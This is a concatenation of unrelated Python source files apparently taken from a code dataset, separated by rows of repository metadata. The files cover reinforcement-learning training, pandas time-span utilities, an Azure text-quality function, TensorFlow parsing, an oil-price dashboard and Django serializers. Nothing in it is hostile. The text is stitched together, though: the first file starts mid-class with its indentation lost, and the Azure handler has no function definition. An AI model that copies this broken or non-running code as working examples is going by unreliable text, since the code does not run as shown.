super().__init__(state_dim, action_dim, max_action,
discount, tau,
policy_noise, noise_clip,
policy_freq, cuda_index)
self.it = 0
self.total_it = [0 for _ in range(num_env)]
self.state_dim = state_dim
self.action_dim = action_dim
self.actor_optimizer_online = torch.optim.Adam(self.actor.parameters(), lr=3e-4)
self.critic_optimizer_online = torch.optim.Adam(self.critic.parameters(), lr=3e-4)
def save(self, filename):
super().save(filename)
torch.save(self.actor_optimizer_online.state_dict(), filename + "_actor_optimizer_online.pt")
torch.save(self.critic_optimizer_online.state_dict(), filename + "_critic_optimizer_online.pt")
def load(self, filename):
super().load(filename)
self.actor_optimizer_online.load_state_dict(torch.load(filename + "_actor_optimizer_online.pt"))
self.critic_optimizer_online.load_state_dict(torch.load(filename + "_critic_optimizer_online.pt"))
def pad_state(self, state):
return torch.cat([state,
torch.zeros(state.shape[0], self.state_dim - state.shape[1]).to(self.device)],
dim=1)
def pad_action(self, action):
return torch.cat([action,
torch.zeros(action.shape[0], self.action_dim - action.shape[1]).to(self.device)],
dim=1)
def train_mt(self, idx, teacher, replay, batch_size=100, is_offline=True):
self.total_it[idx] += 1
state, action, next_state, reward, not_done = replay.sample(batch_size)
state_dim_org = state.shape[1]
action_dim_org = action.shape[1]
with torch.no_grad():
state_pad = self.pad_state(state)
action_pad = self.pad_action(action)
if is_offline:
teacher_q1, teacher_q2 = teacher.critic(state, action)
else:
next_state_pad = self.pad_state(next_state)
next_action = self.actor_target(next_state_pad)
noise = (
torch.rand_like(next_action) * self.policy_noise
).clamp(-self.noise_clip, self.noise_clip)
next_action = (next_action + noise).clamp(-self.max_action, self.max_action)
next_action = next_action[:, :action_dim_org]
next_action_pad = self.pad_action(next_action)
target_q1, target_q2 = self.critic_target(next_state_pad, next_action_pad)
target_q = torch.min(target_q1, target_q2)
target_q = reward + not_done * self.discount * target_q
current_q1, current_q2 = self.critic(state_pad, action_pad)
if is_offline:
critic_loss = F.mse_loss(current_q1, teacher_q1) + F.mse_loss(current_q2, teacher_q2)
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
else:
critic_loss = F.mse_loss(current_q1, target_q) + F.mse_loss(current_q2, target_q)
self.critic_optimizer_online.zero_grad()
critic_loss.backward()
self.critic_optimizer_online.step()
loss = [None, critic_loss.cpu().data.numpy()]
if is_offline or self.total_it[idx] % self.policy_freq == 0:
current_action = self.actor(state_pad)[:, :action_dim_org]
current_action_pad = self.pad_action(current_action)
actor_loss_t = -teacher.critic.Q1(state, current_action)
if is_offline:
actor_loss = actor_loss_t.mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
else:
actor_loss = -self.critic.Q1(state_pad, current_action_pad)
actor_loss = 1.0 * actor_loss + 1.0 * actor_loss_t
actor_loss = actor_loss.mean()
self.actor_optimizer_online.zero_grad()
actor_loss.backward()
self.actor_optimizer_online.step()
self.update_target_network()
loss[0] = actor_loss.cpu().data.numpy()
return loss
| 37.848 | 107 | 0.589939 | 4,656 | 0.984147 | 0 | 0 | 0 | 0 | 0 | 0 | 114 | 0.024096 |
2bcc0cc4e0ece32defaf1db3f2ced89cc0efe672 | 9,929 | py | Python | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 3 | 2015-11-06T15:55:45.000Z | 2016-02-01T14:37:14.000Z | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 1 | 2015-11-03T15:22:08.000Z | 2015-11-03T15:22:08.000Z | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 1 | 2015-11-03T15:12:48.000Z | 2015-11-03T15:12:48.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
from .exceptions import BadLengthsError, BegPosteriorToEndError, OverlapError, NotSortedError, IntegrityError, HasTimezoneError
def audit_timespan(begs, ends):
    """Validate that two timestamp Series describe clean time spans.

    Raises a specific exception for: timezone-aware input, mismatched
    lengths, a beginning after its end, unsorted beginnings, or overlap
    between consecutive spans. Returns None when everything checks out
    (including the empty case).
    """
    if begs.empty and ends.empty:
        return
    if begs.dt.tz or ends.dt.tz:
        raise HasTimezoneError
    if len(begs) != len(ends):
        raise BadLengthsError
    if any(beg > end for beg, end in zip(begs, ends)):
        raise BegPosteriorToEndError
    if (begs < begs.shift()).sum():
        raise NotSortedError
    if (ends.shift() > begs)[1:].sum():
        raise OverlapError
def audit_timespan_print(begs, ends):
    """Print diagnostics for the same conditions audit_timespan raises on.

    Non-raising variant: reports timezone usage, length mismatch, inverted
    spans, unsorted beginnings, and overlaps between consecutive spans.
    """
    if begs.dt.tz or ends.dt.tz:
        print('')
        print('TimeZoneError')
    if len(begs) != len(ends):
        print('')
        print('TimeZoneError')
    for beg, end in zip(begs, ends):
        if beg > end:
            print('')
            print('beg=', beg, ' posterior to end=', end)
    for i in range(len(begs) - 1):
        nxt_beg = begs[i + 1]
        if nxt_beg < begs[i]:
            print('Events are not sorted')
        if ends[i] > nxt_beg:
            print('At row %s end %s is posterior to %s by %s' % (i, ends[i], nxt_beg, ends[i] - nxt_beg))
def describe_timespan(begs, ends):
    """Return a summary Series for a set of time spans.

    Reports first beginning, span count, how many transitions are
    contiguous (a span starting exactly where the previous one ended),
    coverage ratio of the overall interval, and the last end. Prints a
    message and returns None for empty input.
    """
    if begs.empty and ends.empty:
        print('Empty series')
        return
    n = len(begs)
    contiguous = (begs == ends.shift()).sum()
    covered_seconds = (ends - begs).sum().total_seconds()
    total_seconds = (ends[n - 1] - begs[0]).total_seconds()
    metric_pairs = [
        ('beg', begs[0]),
        ('count', n),
        ('contiguous transitions', contiguous),
        ('not contiguous transitions', n - contiguous - 1),
        ('coverage', covered_seconds / total_seconds),
        ('end', ends[n - 1]),
    ]
    labels = [name for name, _ in metric_pairs]
    values = [value for _, value in metric_pairs]
    return pd.Series(values, index=labels)
def clean_overlap_timespan(begs, ends):
    """Truncate each span's end to the next span's beginning.

    Returns, row-wise, the minimum of the original end and the following
    span's beginning (the last row keeps its own end).
    """
    candidates = pd.DataFrame({'ts_end': ends, 'ts_end_shifted': begs.shift(-1)})
    return candidates.min(axis=1)
def fill_na_series(series):
    """In-place fillna: 'UNDEFINED' for object-dtype series, -1 otherwise."""
    filler = 'UNDEFINED' if series.dtype.char == 'O' else -1
    series.fillna(filler, inplace=True)
def fill_na_dataframe(df):
    """Apply fill_na_series in place to every 'beg_*' / 'end_*' column."""
    targets = [col for col in df.columns if col.startswith(('beg_', 'end_'))]
    for col in targets:
        fill_na_series(df[col])
def to_stamps(df, state_columns, value_columns, beg_col='ts_beg', end_col='ts_end'):
    '''
    Convert a frame representing periods (eg each row has a beg and end) to a frame representing change of periods.
    Example:
    This dataframe:
      dummy     ts_beg     ts_end  value
    0      3 2015-01-01 2015-01-02      1
    1      4 2015-01-02 2015-01-03      2
    is converted to
              ts  beg_value  end_value
    0 2015-01-01          1        NaN
    1 2015-01-02          2          1
    2 2015-01-03        NaN          2
    Raises IntegrityError if the resulting stamps are not unique.
    '''
    # rename map for the "beginning" view: beg_col becomes the stamp 'ts',
    # state columns gain a 'beg_' prefix, already-prefixed value columns
    # ('beg_<col>') are stripped back to the bare column name
    beg_columns = dict(
        [(beg_col, 'ts')] +
        [(col, 'beg_%s' % col) for col in state_columns] +
        [('beg_%s' % col, col) for col in value_columns]
    )
    # symmetric rename map for the "ending" view ('end_' prefix)
    end_columns = dict(
        [(end_col, 'ts')] +
        [(col, 'end_%s' % col) for col in state_columns] +
        [('end_%s' % col, col) for col in value_columns]
    )
    df1 = pd.DataFrame(df, columns=list(beg_columns.keys()))
    df1.rename(columns=beg_columns, inplace=True)
    df2 = pd.DataFrame(df, columns=list(end_columns.keys()))
    df2.rename(columns=end_columns, inplace=True)
    # return df1, df2
    # outer-merge the two views on the stamp (plus any shared value columns)
    # so a contiguous transition collapses into a single row carrying both
    # the 'end_*' of the previous span and the 'beg_*' of the next
    retval = pd.merge(
        df1,
        df2,
        on=['ts'] + value_columns,
        how='outer'
    )
    retval.sort_values('ts', inplace=True)
    # duplicate stamps mean the spans were not well-formed
    if retval['ts'].duplicated().sum():
        raise IntegrityError
    fill_na_dataframe(retval)
    return retval
def to_spans(df, state_columns, value_columns, beg_col='ts_beg', end_col='ts_end'):
    '''
    Revert method of to_stamps: rebuild one span per pair of consecutive stamps.
    Example:
    This dataframe:
              ts  beg_value  end_value
    0 2015-01-01          1        NaN
    1 2015-01-02          2          1
    2 2015-01-03        NaN          2
    is converted to
          ts_beg     ts_end  value
    0 2015-01-01 2015-01-02      1
    1 2015-01-02 2015-01-03      2
    '''
    # inverse rename maps of to_stamps: the stamp 'ts' becomes beg_col/end_col,
    # 'beg_<col>' / 'end_<col>' state columns are stripped of their prefix,
    # and bare value columns are re-prefixed
    beg_columns = dict(
        [('ts', beg_col)] +
        [('beg_%s' % col, col) for col in state_columns] +
        [(col, 'beg_%s' % col) for col in value_columns]
    )
    end_columns = dict(
        [('ts', end_col)] +
        [('end_%s' % col, col) for col in state_columns] +
        [(col, 'end_%s' % col) for col in value_columns]
    )
    # each span starts at stamp i (all stamps but the last) ...
    df_beg = pd.DataFrame(df.iloc[:-1], columns=beg_columns.keys())
    df_beg.rename(columns=beg_columns, inplace=True)
    df_beg.reset_index(drop=True, inplace=True)
    # ... and ends at stamp i+1 (all stamps but the first)
    df_end = pd.DataFrame(df.iloc[1:], columns=end_columns.keys())
    df_end.rename(columns=end_columns, inplace=True)
    df_end.reset_index(drop=True, inplace=True)
    # print(df_beg)
    # print(df_end)
    # recombine the row-aligned beg/end views into a single spans frame
    return pd.DataFrame(dict(list(df_beg.to_dict('series').items()) + list(df_end.to_dict('series').items())))
# def merge_spans(left, right):
# for key in ('beg', 'end'):
# spans['ts'] = spans['ts_%s' % key]
# spans = pd.merge(stamps, spans, how='outer', on='ts')
# spans.set_index('ts', inplace=True)
# spans.sort_index(inplace=True)
# for column in columns_states:
# spans['%s_%s' % (column, key)] = spans.pop(column).interpolate(method='time')
# spans['%s_%s' % (column, key)].fillna(method='ffill', inplace=True)
# spans['%s_%s' % (column, key)].fillna(method='bfill', inplace=True)
# spans.reset_index(inplace=True)
# spans.pop('ts')
# spans = spans[~pd.isnull(spans['ts_%s' % key])]
# return spans
def compute_segments(df, columns):
    '''
    Assign a 1-based segment id to each row of *df*: a new segment starts
    whenever the value of any of *columns* differs from the previous row.
    Args:
        - df (pandas dataframe)
        - columns (iterable of str): column names whose changes delimit segments
    Returns:
        pandas Series of int segment ids, aligned with df's index.
    '''
    # bugfix: build the seed mask on df's own index; a positional
    # RangeIndex misaligned (NaN-filled) against frames with a custom index
    mask = pd.Series(False, index=df.index)
    for column in columns:
        # first row always compares unequal to its NaN shift -> starts segment 1
        mask = mask | (df[column] != df[column].shift(1))
    return mask.astype(int).cumsum()
def merge_overlapping_events(df, beg, end, kind=None):
    '''
    Args:
        - df (pandas dataframe): contains events.
        - beg (str): name of the column containing beginning timestamps.
        - end (str): name of the column containing ending timestamps.
        - kind (str): name of the column describing the kind of events (useful if two kind of events coexist and you do not want to merge events
        of different kinds).
    Output:
        - ddf (pandas dataframe). Dataframe df where overlapping events have been merged

    Algorithm: sort events by *beg*, then sweep left to right; whenever an
    event's end reaches past the next event's beginning, fold the run of
    overlapping events into one span and keep only its first row.
    '''
    if kind is None:
        ddf = df.sort_values(by=beg).reset_index(drop=True)
        # work on positional copies of the timestamp columns
        begs = ddf[beg].copy()
        ends = ddf[end].copy()
        i=0
        while i <= len(begs)-2:
            j=i+1
            while ends[i]>begs[j]: # one enters the loop iff there is an overlap
                begs[j]=begs[i] # event j actually starts at begs[i]
                ends[i]=max(ends[i],ends[j]) # event i actually ends at least at ends[j]
                if j<len(begs)-1:
                    j+=1
                else:
                    break
            i=j
            # At this point, event i :
            # - starts at the initial begs[i] which was the correct one
            #   thanks to the initial sort_values
            # - ends at ends[j] with j the latest overlapping event after i
            #
            # We drop all events from i+1 to j
        # swap the adjusted timestamp columns back into the frame
        for l in [beg,end]:
            ddf.pop(l)
        ddf[beg]=begs
        ddf[end]=ends
        # rows of a merged run now share the same beg; keep the first of each
        ddf = ddf.drop_duplicates(beg, keep='first').reset_index(drop=True)
    else:
        raise ValueError('Case kind is not None not coded yet')
    return ddf
def merge_overlapping_events_kind(df, beg, end, kind=None):
    '''
    Args:
        - df (pandas dataframe): contains events.
        - beg (str): name of the column containing beginning timestamps.
        - end (str): name of the column containing ending timestamps.
        - kind (list of str): name of the column(s) describing the kind of events (useful if
          two kinds of events coexist and you do not want to merge events of different kinds).
    Output:
        - new_df (pandas dataframe). Dataframe df where overlapping events of the
          same kind have been merged.
    '''
    # start from an empty frame carrying the beg/end columns so the output
    # keeps those columns first, as before
    parts = [pd.DataFrame({beg: [], end: []})]
    # merge overlaps independently within each kind group
    for _group_key, ddf in df.groupby(kind):
        parts.append(merge_overlapping_events(ddf, beg, end))
    # bugfix/modernization: DataFrame.append was removed in pandas 2.0;
    # a single concat also avoids the O(n^2) append-in-loop
    new_df = pd.concat(parts, ignore_index=True)
    return new_df.reset_index(drop=True)
def add_time_between_events(df, beg, end, kind=None):
    '''
    Args:
        - df (pandas dataframe): contains events.
        - beg (str) : name of the column containing beginning timestamps.
        - end (str) : name of the column containing ending timestamps.
        - kind (list of str): list of the columns defining a kind of event (if you want to study separately
        different kinds of events)
    Output:
        - new_df (pandas dataframe): df with two extra columns per group,
          'time_since_previous' (gap to the previous event of the same kind)
          and 'time_to_next' (gap to the next one); None/NaT at the edges.
    '''
    # seed with an empty beg/end frame so those columns stay first in the output
    parts = [pd.DataFrame({beg: [], end: []})]
    for _group_key, ddf in df.groupby(kind):
        dddf = ddf.sort_values(by=beg).reset_index(drop=True).copy()
        begs = dddf[beg].values
        ends = dddf[end].values
        if len(begs) > 1:
            # gap before event i is beg[i] - end[i-1]; first event has no predecessor
            time_since_previous = [None] + [begs[i] - ends[i - 1] for i in range(1, len(begs))]
            # gap after event i is beg[i+1] - end[i]; last event has no successor
            time_to_next = [begs[i + 1] - ends[i] for i in range(len(begs) - 1)] + [None]
            dddf['time_since_previous'] = pd.Series(time_since_previous)
            dddf['time_to_next'] = pd.Series(time_to_next)
        else:
            dddf['time_since_previous'] = pd.Series([None])
            dddf['time_to_next'] = pd.Series([None])
        parts.append(dddf)
    # bugfix/modernization: DataFrame.append was removed in pandas 2.0;
    # one concat also replaces the quadratic append-in-loop
    return pd.concat(parts, ignore_index=True)
| 34.716783 | 169 | 0.58727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,791 | 0.381811 |
2bcc86f67e357c8f3e80e523d649bd5073ea89d6 | 2,594 | py | Python | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 128 | 2019-06-12T19:24:34.000Z | 2022-03-08T18:39:40.000Z | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 47 | 2019-07-15T22:04:23.000Z | 2022-03-04T18:35:57.000Z | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 99 | 2019-06-28T20:56:21.000Z | 2022-03-30T17:17:24.000Z | # Standard libraries
import os
import json
import logging
from typing import Text
# Azure functions
import azure.functions as func
# Inference runtime
import onnxruntime as ort
from tokenizers import BertWordPieceTokenizer
# Helper scripts
from .PreprocessData import normalize_text, truncate_text
from .Predict import get_ids_and_masks, predict
# Initialize ONNX runtime and language model tokenizer at module scope so the
# model and tokenizer load once per worker process, not on every request
vocab_file_path = os.path.join(os.path.dirname(__file__), "Model/bert-base-uncased-vocab.txt")
onnx_file_path = os.path.join(os.path.dirname(__file__), "Model/watchdog_model.onnx")
# WordPiece tokenizer configured to pad/truncate to a fixed length of 128,
# matching the sequence length the ONNX model expects
tokenizer = BertWordPieceTokenizer(vocab_file_path)
tokenizer.enable_padding(pad_id=0, pad_token="[PAD]", length=128)
tokenizer.enable_truncation(max_length=128)
ort_session = ort.InferenceSession(onnx_file_path)
logging.info('Invoked TextQualityWatchdog Skill.')
try:
body = json.dumps(req.get_json())
if body:
logging.info(body)
values = json.loads(body)['values']
results = {}
results["values"] = []
for value in values:
text = value['data']['text']
# Apply puntuation and whitespace normalization, and convert to lowercase
text = normalize_text(text)
# Truncate the text to a maximum of 128 (default) whitespace separated tokens
text = truncate_text(text)
# Compute the input tokens and attention masks for the text sequence
input_ids, attention_masks = get_ids_and_masks(tokenizer, text)
# Call the ONNX model to perform inference on the input
flat_prediction = predict(ort_session, input_ids, attention_masks)
payload = (
{
"recordId": value['recordId'],
"data": {
"text_quality_warning": int(flat_prediction[0])
}
}
)
results["values"].append(payload)
result = json.dumps(results, ensure_ascii=False)
return func.HttpResponse(result, mimetype="application/json")
else:
return func.HttpResponse(
"Invalid body",
status_code=400
)
except ValueError:
return func.HttpResponse(
"Invalid body",
status_code=400
)
| 32.024691 | 94 | 0.597147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 634 | 0.24441 |
2bcf3f2068544439d767a23babe47f9de75492b6 | 286 | py | Python | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | 1 | 2020-01-21T11:10:51.000Z | 2020-01-21T11:10:51.000Z | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null |
import py
from pypy.jit.backend.x86.test.test_basic import Jit386Mixin
from pypy.jit.metainterp.test import test_quasiimmut
class TestLoopSpec(Jit386Mixin, test_quasiimmut.QuasiImmutTests):
    """Run the backend-agnostic quasi-immutable tests against the x86 JIT
    backend (all test methods are inherited from QuasiImmutTests)."""
    # for the individual tests see
    # ====> ../../../metainterp/test/test_loop.py
    pass
| 28.6 | 65 | 0.758741 | 159 | 0.555944 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.262238 |
2bcff61c9348a9aaa8c0c129bc93fe66d8eb6d8c | 1,130 | py | Python | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 95 | 2019-08-30T21:30:38.000Z | 2021-12-30T13:35:39.000Z | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 15 | 2019-11-02T11:48:35.000Z | 2020-11-13T17:37:07.000Z | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 19 | 2019-11-07T05:24:36.000Z | 2021-10-13T13:13:04.000Z | import tensorflow as tf
def get_record_parser_qqp(config, is_test=False):
    """Return a TFRecord parser for question-pair (QQP) examples.

    The parser decodes two question index sequences, a 2-class label, and
    an example id. Uses config.test_ques_limit in test mode, otherwise
    config.ques_limit.
    """
    def parse(example):
        """Parse one serialized tf.Example into (ques1, ques2, label, id)."""
        ques_limit = config.test_ques_limit if is_test else config.ques_limit
        features = tf.parse_single_example(example,
                                           features={
                                               "ques1_idxs": tf.FixedLenFeature([], tf.string),
                                               "ques2_idxs": tf.FixedLenFeature([], tf.string),
                                               "label": tf.FixedLenFeature([], tf.string),
                                               "id": tf.FixedLenFeature([], tf.int64)
                                           })
        # decode raw int32 buffers into fixed-length index vectors
        # NOTE(review): the +2 presumably accounts for two extra sequence
        # markers added upstream (e.g. begin/end tokens) — confirm against
        # the preprocessing that wrote these records
        ques1_idxs = tf.reshape(tf.decode_raw(
            features["ques1_idxs"], tf.int32), [ques_limit + 2])
        ques2_idxs = tf.reshape(tf.decode_raw(
            features["ques2_idxs"], tf.int32), [ques_limit + 2])
        # two-way classification label as float probabilities/one-hot
        label = tf.reshape(tf.decode_raw(
            features["label"], tf.float32), [2])
        qa_id = features["id"]
        return ques1_idxs, ques2_idxs, label, qa_id
    return parse
2bd0edbc04e1e7d77d7b3ed8a265bcd081096652 | 5,019 | py | Python | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | 1 | 2016-05-15T22:16:36.000Z | 2016-05-15T22:16:36.000Z | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | 1 | 2021-04-30T20:36:55.000Z | 2021-04-30T20:36:55.000Z | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | null | null | null | import numpy
import requests
import Quandl
import datetime
from pyrnkr.application import App
from pyrnkr.widgets import Line
from pyrnkr.formula import Trace
def extract_date_index(ts, format='%Y-%m-%d'):
return [x.strftime(format) for x in ts.index.tolist()]
class oil(App):
# This must be consistent with config.json
required_parameters = []
title = 'Overview of Oil' # Appears on top of your application page
subtitle = 'Supply, Consumption, and Prices of Oil Products' # Subtitle to the above
# Production Chart Primary
MultiLineMultiTypeRigCount = "BKRHUGHES/RIGS_BY_BASIN_TOTAL_US_RIG_COUNT" # Example data
SingleLineRigTotal = "BKRHUGHES/RIGS_BY_STATE_TOTALUS_TOTAL"
# Price Charts
BRENT = "EIA/PET_RBRTE_D"
WTI = "EIA/PET_RWTC_D"
# Oil Secondary
MiningUSOilProduction = "FRED/IPG211111CN"
ImportsEndUseCrude = "FRED/IR10000"
OilAndGasWells = "FRED/IPN213111N"
PrivateFixedInvestmentWellsExploration = "FRED/E318RC1Q027SBEA"
# Quandl Token
TOKEN = '' # YOUR TOKEN HERE
def __init__(self, *args, **kwargs):
super(oil, self).__init__(*args, **kwargs)
def get_trace(self, symbol):
"""Get trace for a symbol"""
data = Quandl.get(symbol, authtoken=self.TOKEN)
if data.empty:
raise Exception('could not load series from data source') # If you'd like to handle network
# errors or retry do it here
datay = data[data.columns[0]].tolist() # Data can be manipulated in node.js / python (pandas or numpy)
x = extract_date_index(data)
if len(datay) != len(x):
raise Exception('x and y length do not match') # Sanity Check, trust but verify data feeds
tr = Trace(
x = x,
y = datay,
extra = {
'name': symbol
}
)
return tr # This returns the data to be plotted
def execute(self, parameters):
# Create object to plot
res = {
self.SingleLineRigTotal: {
'title': 'Total U.S. Rig Counts', # Title of individual plot
'subtitle': 'Total U.S. Rotary Rig Counts', # Subtitle of individual plot
'dimension': 'col-md-12', # Bootstrap column dimensions
},
self.BRENT: {
'title': 'Brent Crude',
'subtitle': 'USD Price of Brent Crude Oil',
'dimension': 'col-md-6',
},
self.WTI: {
'title': 'WTI Crude',
'subtitle': 'USD Price of WTI Crude Oil',
'dimension': 'col-md-6',
},
self.MiningUSOilProduction: {
'title': 'US Oil Production',
'subtitle': 'US Oil Production (Indexed 2012 = 100)',
'dimension': 'col-md-6',
},
self.ImportsEndUseCrude: {
'title': 'US Crude Imports',
'subtitle': 'Crude Oil Imports (Indexed 2000 = 100) (Not Seasonally Adjusted)',
'dimension': 'col-md-6',
},
self.OilAndGasWells: {
'title': 'US Oil and Gas Wells',
'subtitle': 'Drilling oil and gas wells',
'dimension': 'col-md-6',
},
self.PrivateFixedInvestmentWellsExploration: {
'title': 'Fixed Investment Wells and Exploration',
'subtitle': '(In Billions USD) (Quarterly Seasonally Adjusted)',
'dimension': 'col-md-6',
}
}
# Because we are using only RNKR line plots iterate through the above create line widgets of variable size
for k, v in res.iteritems():
ts = self.get_trace(k)
res[k]['widget'] = Line(
title=v['title'],
subtitle=v['subtitle'],
dimension=v['dimension'],
traces=[ts]
)
# Render the layout object, primary array is app page, secondary arrays are each bootstrap column
# Styling is dictated here and in the bootstrap column dimensions above
layout = self.render([
[res[self.SingleLineRigTotal]['widget']],
[
res[self.WTI]['widget'],
res[self.BRENT]['widget']
],
[
res[self.MiningUSOilProduction]['widget'],
res[self.ImportsEndUseCrude]['widget']
],
[
res[self.OilAndGasWells]['widget'],
res[self.PrivateFixedInvestmentWellsExploration]['widget']
],
])
return layout, None
def handler(event, context):
    """AWS Lambda entry point.

    Inputs depend on your config.json.
    """
    result, error = oil().run(event)
    if error:
        raise Exception(error)
    return result
# Left for convenience / example of debugging aws lambdas prior to upload
#import json
#print json.dumps(handler({}, {})) | 34.142857 | 114 | 0.560072 | 4,430 | 0.882646 | 0 | 0 | 0 | 0 | 0 | 0 | 2,128 | 0.423989 |
2bd0eeb3efd70d103d079728734a516aeedb0822 | 462 | py | Python | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration removing the ``description`` field from
    the project, projectversion and topic models."""
    dependencies = [("code_doc", "0003_auto_20141107_1708")]
    operations = [
        migrations.RemoveField(model_name="project", name="description"),
        migrations.RemoveField(model_name="projectversion", name="description"),
        migrations.RemoveField(model_name="topic", name="description"),
    ]
| 28.875 | 80 | 0.714286 | 353 | 0.764069 | 0 | 0 | 0 | 0 | 0 | 0 | 129 | 0.279221 |
2bd1d28b58763f72536e86090757cedb32c8e0f0 | 193 | py | Python | source/piclient/camerapi/camerahandler_faker.py | rveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | 1 | 2017-07-05T06:47:57.000Z | 2017-07-05T06:47:57.000Z | source/piclient/camerapi/camerahandler_faker.py | royveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | null | null | null | source/piclient/camerapi/camerahandler_faker.py | royveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | null | null | null | def capture_high_res(filename):
return "./camerapi/tmp_large.jpg"
def capture_low_res(filename):
    """Fake capture: ignore *filename*, return the canned small-image path."""
    return "./camerapi/tmp_small.jpg"
def init():
    """Fake backend: nothing to initialise."""
    return None
def deinit():
    """Fake backend: nothing to tear down."""
    return None
| 12.866667 | 37 | 0.689119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.26943 |
2bd347c1734d1e220233fe8467a010ceab1c41ab | 120 | py | Python | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | 15 | 2021-06-09T00:50:53.000Z | 2022-03-15T07:01:43.000Z | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | null | null | null | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | 4 | 2021-06-09T01:01:43.000Z | 2021-11-03T06:16:50.000Z | from .parallel import DataParallelModel, DataParallelCriterion
__all__ = ["DataParallelModel", "DataParallelCriterion"] | 40 | 62 | 0.841667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.35 |
2bd58136299dfe9fb78fc5afd520e4be379aa582 | 10,136 | py | Python | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | null | null | null | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | null | null | null | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | 1 | 2022-03-17T12:47:40.000Z | 2022-03-17T12:47:40.000Z | from django.contrib.auth.password_validation import validate_password
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils.encoding import force_str
from django.utils.http import urlsafe_base64_decode
from rest_framework.exceptions import AuthenticationFailed
from rest_framework.serializers import (
CharField, EmailField, ModelSerializer, Serializer, ValidationError)
from rest_framework.validators import UniqueValidator
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from accounts.models import NGO, CustomUser, Donner
class MyTokenObtainPairSerializer(TokenObtainPairSerializer):
    """JWT token serializer that embeds the user's email and account
    type as custom claims in the issued token."""
    @classmethod
    def get_token(cls, user):
        token = super(MyTokenObtainPairSerializer, cls).get_token(user)
        # Add custom claims
        token["email"] = user.email
        token["type"] = user.type
        return token
class DonnerDetailSerializer(ModelSerializer):
    """Read serializer for a Donner's profile.

    Auth/bookkeeping fields (password, permissions, groups, ...) are
    excluded from the serialized output.
    """
    class Meta:
        model = Donner
        exclude = (
            "is_superuser",
            "is_staff",
            "last_login",
            "password",
            "country",
            "user_permissions",
            "groups",
        )
class NGODetailSerializer(ModelSerializer):
    """Read serializer for an NGO's profile.

    NOTE(review): unlike DonnerDetailSerializer, "groups" is not in the
    exclude list here -- confirm whether exposing it is intentional.
    """
    class Meta:
        model = NGO
        exclude = (
            "is_superuser",
            "is_staff",
            "last_login",
            "password",
            "country",
            "user_permissions",
